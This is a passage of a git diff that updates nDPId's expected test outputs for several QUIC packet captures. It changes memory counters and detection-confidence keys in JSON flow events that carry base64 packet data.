packets captured/processed: 518/518 @@ -71,9 +71,9 @@ ~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5894262 bytes -~~ total memory freed........: 5894262 bytes -~~ total allocations/frees...: 118676/118676 +~~ total memory allocated....: 6027896 bytes +~~ total memory freed........: 6027896 bytes +~~ total allocations/frees...: 121438/121438 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 2271 chars diff --git a/test/results/quic046.pcap.out b/test/results/quic046.pcap.out index e98969e35..0b2461406 100644 --- a/test/results/quic046.pcap.out +++ b/test/results/quic046.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1584456191933} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584456191933,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1584456191933,"pkt":"ILABHGh4AJqdnpsZCABFAAViVw9AAIARNVbAqAHs2DrOVsWbAbsFTsB3w1EwNDZQtKT59fQu3TkAAAABmZPTs83+bYJOmUXloAEEAENITE8ZAAAAUEFEAPABAABTTkkA+wEAAFNUSwAxAgAAVkVSADUCAABDQ1MARQIAAE5PTkNlAgAAQUVBRGkCAABVQUlEmAIAAFNDSUSoAgAAVENJRKwCAABQRE1EsAIAAFNNSEy0AgAASUNTTLgCAABOT05Q2AIAAFBVQlP4AgAATUlEU\/wCAABTQ0xTAAMAAEtFWFMEAwAAWExDVAwDAABDU0NUDAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0taS55dGltZy5jb23iUlTd91Wbyacedc4KWbvYAO9ezSoYOG3jhMeQafLfpHKvILz9Ye+me5P5nrw5Y\/leQsX7MclRMDQ2AeiBYJKSGuh+7YCGohWCkV5w4f4wMDAwMDAwML0xAKSRUT2iY62vYCLSlIfkuoKwQUVTR0Nocm9tZS84MC4wLjM5ODcuMTMyIFdpbmRvd3MgTlQgNi4zOyBXaW42NDsgeDY0mMqP9vF+kzJdLqfvNTDv5wAAAABYNTA5AQAAAB4AAABhJXvQ9+6Hu83ruEOa1Y6Y5fjbWd3ky8\/JdT+d+\/AZZsvZnn1BDAzSykK3Urbw\/IrLoBtlbcpqYoDEomljzhkwZAAAAAEAAABDMjU18ubMxD2HxlI1UlRPQUNLRPLmzMQ9h8ZSYDLLkqBBTd\/6RwAAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/80.0.3987.132 Windows NT 6.3; Win64; x64"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/80.0.3987.132 Windows NT 6.3; Win64; x64"}} 
01154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584456191934,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":574,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":574,"pkt_l4_len":540,"thread_ts_msec":1584456191934,"pkt":"ILABHGh4AJqdnpsZCABFAAIwVxBAAIAROIfAqAHs2DrOVsWbAbsCHCGo01EwNDZQtKT59fQu3TkAAAAChrDGo43cDq7OAgdbv23GehH0jM01fB5SqCBHGsm4tNDoSAuylkVeyVU1nO51BVLZDdQpzNO9j8lf2o\/kFvxF1keBb1V8bWQbm4GDCTzD9DJbwk6JCzbiEHbQt2\/y4DufAauHa+qhpg6F7I1VBRA5chHzaHSfbKq18eEDQ2D7fby9uiPXDB6cfTGjCACXfFYXGo9zhyaFNtzZv4x3bPv04LGnwloRH845hLIF6d5Y+oKP0inx4RVaOxEjSkSubSvYLun8u1+DAfAvr3DdmGZRAp60H0VhNkgFDR0TK1bvdtwD\/6cndHRtyUINoQIRApDi1wb1MmCAOOvL7steTPHXY5nIkaq4iXTy+WyGwwX1EiuR+wqkWZoB8nUqj3ZqApzNfexl+c7aCawPzdHT3P5zDq7dSyz1wAkXCTveL49FopZWy\/uuB+P5RJbaGpw3CvzBYR4o98uBght36oYbWpopqUw9u0okr+r3kEm4Q75LZzqLS97VgZsNPml00CwyHuDEnhiPWf19O4H99TJdYurnXZ+SQi1Zt2RI1GgBrEOAj7V7V\/6W2VgqcYkPqL1UO6lW\/zp\/K8LZMma1gVsHh4jJ1oXnE7Qjtqi9Um0bkNgFqZBX1s4cYf2FTDL0Lgyu2DOK3ATmX6nv91Qh9\/msYcWCN59XOhhsFRlmXSuc2N2TzOTtWg=="} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584456191934,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":1584456191934,"pkt":"ILABHGh4AJqdnpsZCABFAAByVxFAAIAROkTAqAHs2DrOVsWbAbsAXuOl01EwNDZQtKT59fQu3TkAAAADQ7oFqOGvWa6mhIUAfFpbpAofPEreEA\/GGklYOasxEedYwPIHZE9zXMBgbnX+9bPuSN5MQzRW31QsSe2iJHxiKYqGbP8="} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1584456191933,"flow_last_seen":1584456191986,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":87097,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1584456191986,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1584456191933,"flow_last_seen":1584456191986,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":87097,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1584456191986,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":87097,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1584456191986} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ 
~~ packets captured/processed: 100/100 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872391 bytes -~~ total memory freed........: 5872391 bytes -~~ total allocations/frees...: 118215/118215 +~~ total memory allocated....: 6006025 bytes +~~ total memory freed........: 6006025 bytes +~~ total allocations/frees...: 120977/120977 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2248 chars diff --git a/test/results/quic_0RTT.pcap.out b/test/results/quic_0RTT.pcap.out index 5de0df4ca..22678dd3f 100644 --- a/test/results/quic_0RTT.pcap.out +++ b/test/results/quic_0RTT.pcap.out 
@@ -2,9 +2,9 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1603888789791} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603888789791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603888789791,"pkt":"AAAAAAAAAAAAAAAAht1gINJtBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB7CsRWwTYBOvD\/wAAHAhCNdWrrb4+VQiw7LD1RGMN+zL7OkPMAtXpNlW5O0b2\/q+3KdcOtoYFqBIwOi4AbeOZTA9r8spxR89EzuGsSMH\/bUH9ekHEQ922xeaUjW2FgbWmXjMqS+663UY67NIITXpkFxwR22N+eMGvlLVxq1DPyvGiZiTcqCSaCZ0JYqKt+vdrIBp0w3K49QUaWm1DuJd+cQIJzCcz93gKXA+aQn8qJuO+lEHGyiCLVgeWI9\/dk7q4fiSnyVYB8Z\/88\/1PGsSPr7zMnahidPl8sGnTG9MT+px4myWEEHOjoSU0yW9DlNQElkOgitzZjllGvGhUhiBIICMF4QAUv3\/uP2UIoOlO5XivEkb+TEkDY+TeRlQOAIIUbsGZNooxIOe9TQJ82TvA7CrEVTKBa\/0UwEVbDA+egVUviZQiH5ib3Eft7yjRSwrLosJr+JYLE\/b1gPCQqV3\/X9AjXGrd184V\/I069AxL1W3hrfjhc9kTxr61FQb3iBePpHQNPrmWPpWzg65lBvr27yyzoj6wYSTbO781l0YatfDl\/dDvdQIfKr2P6uLMGzJJZkB+Ef6aEehROc00Tde4mLvS3KtN0T7iH4IEsYc3Db9k0scho9GMCBSBIiEPvgGR0Y67dvPV5slktWIWuArg\/VlYjYX5wnaRfV563WjXbTYNGUsYH6yJ12K39PLd+9sxGuDsDv7wuOHQ\/wAAHAhCNdWrrb4+VQiw7LD1RGMN+0KnwyOIE1IPFP+gl6zZC2dnhr2vJbjX4p4gjfOHidbDFdeXHDeCB6AR+v8jJSYiWVKpOKT1tYDZ2eaYAb8EM4juskAwg8WJRDDALjE67avfbFy2bAKFGVwliLbq9g9yfe2DG7zudaoq7VcKjW8DJUYzFu0kG3f0I+eg9KERSSE9tNgraaUChfDY0CfeGXPHIGfNOqV2eildt3CypMlgx434dmv5i8bOFyWursPeR9FPxLAp0E17z39ZowCy9mzMTuEiKSfVFZVEb8A56B9ppGExgQC8QO0Af3vfqS2ttKNvFYUOgdWvnxDVxIQ3xlWS6ELnr9IEyJP7QN13nNZW2yyDnRClGdlAqhKZndvswyZgxdwswpMFr+Hp46L60HP3+Etr\/g+ZQ+dSKaPL8j+qjU4\/5GbDlG+Y8GGpP5yetDzWW4wN5wTi1RfvXLkUi4VB3m4LwQbvS4nockw+p2t9FIJYuLtV0dMHU6Hv7HaVbrS2rEeooj88IkO1U14qUJPxLmg2Uy36iXq2YaI6VfIvwaNOpQxMq6KJ4BIC327gV6F7pkRGqQyr\/fLXQ9\/QAgpjmMNkP95RpEi6vYM4P3hLk7YGQVBnB+IU0NE43CFBWiQCbD6GGRc88ZdV8uxhElyGuoq\/YHF3odV6QEFs9PDd2W40mlJEPTrU\/YbNrDK9EX6uJSY7GfN5JJTDeEvWfQOsQ0uy8IYjlyJ5TxtnQXnq04wVfUtffinNWMR7cNrjwWmw0LkdigoLMel\/dN7JQkDILpNPwSYQ0
7T0bRnC52xgOJ5umHTPriox2zwHfRI6lLvfBx7j5PR\/iXTtkoj6weekfmGYFZhQNsP1hkCk+6CJfCIo1m1SFLNWhogGJZIJgLWrvdtqIciw9ptTqsx5dUUsMd3KoDy70p2VEA=="} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"abcd","version":"TLSv1.3","alpn":"h3-32","ja3":"a7b629a5bd67bfc25e2c78b3daa4c12f","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"abcd","version":"TLSv1.3","alpn":"h3-32","ja3":"a7b629a5bd67bfc25e2c78b3daa4c12f","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1603888789792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603888789792,"pkt":"AAAAAAAAAAAAAAAAht1gIEmLBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvsKwTYBOuB\/wAAHAiw7LD1RGMN+wgWsFEjN2HZaQBAoeulPe6gJ\/sr\/GIbyJYc14UNgXtYbxk5qiSqETQY4WZpoAlQETVvk0wWYFOpUIdBARl1suh9iNp9EVeqqDCK8cOmjC1x9D6Kfk9hGxfOeT71tvhKd4oN+bdYPjbqVP0GFxeHN3IMs7Zr+fKeQyuFIUWnb5Z155Se3XdA\/gkvhnMx1ULX5WEKCC9gZx60DO5zH6utYTXgxvBd7Ru+OqadPKlFof8AABwIsOyw9URjDfsIFrBRIzdh2WlAxDmD+hjo+e1bU72YwbmAGOLxO5htQDsPNuVs6LSSsGz3SFw0RPm4E415JCnhx8Ge0QKEWADh5iBKGwMueF2ztpwDH7jsWxr3wB6t01oBA1kA7ZvkbHO543VSXW8URQBDqZoClPbnrQAcBZ+H69\/w3iitABvrJy3KVNkC9+NdHjbogcNpY\/5rLpRLS5HK\/H6JgUnP0BdrxIIF6HWRic\/Wf7gn1j0WoelZtuUrK3RpR66wFjn8EMNQiKG+ggDuldLKh\/U6tL0BsOyw9URjDfuFTTkGJh6F+XUUpTe3M82jojmegspYUKam1MxQec2Qkg\/alipH7KpbN4YAt16GjKA0vziYX61TA5r\/+c+B2T\/sfMV9v\/HKdLDeTVTmLVtM6L+LQWLFNxbF4yrEngXf\/VZT2XaqBGXuy2LCG0Ll9PjYDBtAtstKFFXX1\/Aq9PC+CdywR1PopMQdX5Z9pMSyZiyB5Lzg3cVGVQshXQFro5Kf54d6amO7D2XxOTcZnQiaAf\/TGRrLMf2QELrrUW5vGD6IdIKDtOHH0dTjyWhDTPJEfsacf7m9B9Xhce36eKCRqwlUUYp9cEORg9tAs+LNJkhiCPhfdI2kmtp2bekrtpez6Fafq\/eSu5bTHdTjUlYAqlsCVns0h2QvzRkddQkOUP7gAh5QNKxagIYkVNaIjoRzRpVUuqTaY5AYQbzrX47APe8VY1hIf5XFE6TPMKmMe2Q\/0CtWSycEDeCk28gGteNWfkas+cB+UI1rrRtWgkmad7zXpxmJvEVKx1EjCgwWfU89z+KDl6jD4P4IeVlDy+ynTr4HbYfYMZyTtc1RDHu8b7675WQKM\/HIrQq6E8CeXlwrV\/kN4X7y3aDTZ8UUUEk3f6P1Q8uLPJ2Yruxo4hJaXf2cw6q7EdHqcpvwl9wyP0SydRM5I5Xs9cDxcS9AAJl75598Onx7hfnsjzw2+Lk4PiuB9x8RRtBxDIfr1GIv04yL1ivxWfjBmvn9aCE1EDAtVLxBhg2AhlMxK5+fcZuD8gajCU3jBi
m0JQ1mEhqnrWZNbjfhTXGYll4oRXXUgYKlIV5s1CchSlcMgg5uu0+4Aj3J0p8FsizlxDbb6CHs\/xgqFSxARbNxD3LVLxEd+HIIdIWwvT1MTqPrwh0uOKGI3kFXzTPm+StyKn3RLAeyIgL4EkpQslwgXWxlUtDWXyicGhGk5giCxEYaSUkCR2ecvlHkQpbq28IGeTXJEr9czuuYuc6xx6JNXW8HuS7eYhN\/9rkNRrkW+Ih9+rtXr1O+2Dy7ZXSKTG4Wnmba1vr6ZEKbxvCvQURsWLQQxX5DHxb0xG+It92fZknkVToOutQ6p1RiqEpFpKmIm03EPunCuw=="} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603888789791,"flow_last_seen":1603888789792,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789792,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603888789791,"flow_last_seen":1603888789792,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603888789792,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":2464,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1603888789792} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878175 bytes -~~ total memory freed........: 5878175 bytes -~~ total allocations/frees...: 118137/118137 +~~ total memory allocated....: 6011809 bytes +~~ total memory freed........: 6011809 bytes +~~ total allocations/frees...: 120899/120899 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2139 chars diff --git a/test/results/quic_crypto_aes_auth_size.pcap.out b/test/results/quic_crypto_aes_auth_size.pcap.out index 5ef9ae9e5..f5ca7ae5d 100644 --- a/test/results/quic_crypto_aes_auth_size.pcap.out +++ b/test/results/quic_crypto_aes_auth_size.pcap.out 
@@ -2,12 +2,12 @@ 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639054047280} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054047280,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02277{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054047280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1639054047280,"pkt":"AAAAAAAAAAMAKVHRCABFAAVifypAAD8RWHqGNSQrjmgmHohlAbsFTlBUwQAAAAEIajnnvXpZQGkAQKS1+N8fvEy\/IOkT4oydortAv2EA7pMR1b57qEUN\/CWLgwIsiaJrsQ4hFHO3l4u7VGBrkULKHI\/lxjDWdE1irA7d2B7h4jkYKWy0HD2ljAAwNUaCq2GQKYIMFYPPnjUgnc6NRkaRBhSzAe8fZndm3nU75Z7WMus4y4FiuskzWK7wPKBIM7bxQiBvpY62McQkd0tyvv46Jp9sqnschBDc67JbIa9bgESPp+gcP9R53I2XHVB+sKt85pW8jfCDOYD2MzyGLQ+T55Kb3elNggevRPNt5\/n5LSD1+BaMwPIWniyhyXqn9M7ZOvHxtplESf3\/ummwgMYCFjWE4x4CgV+8lqttLnKDT+33uPLxFmhUHvuyRgYs53v+N7Yn38UufUU6ZhOXmHE8+XWeHs3tu8WDodE6SWRhM5xseVzCZYLGTT3X6CjYNFcJl6kyqmquwogEu3CCHnXmS\/INjB4uSUiyMhR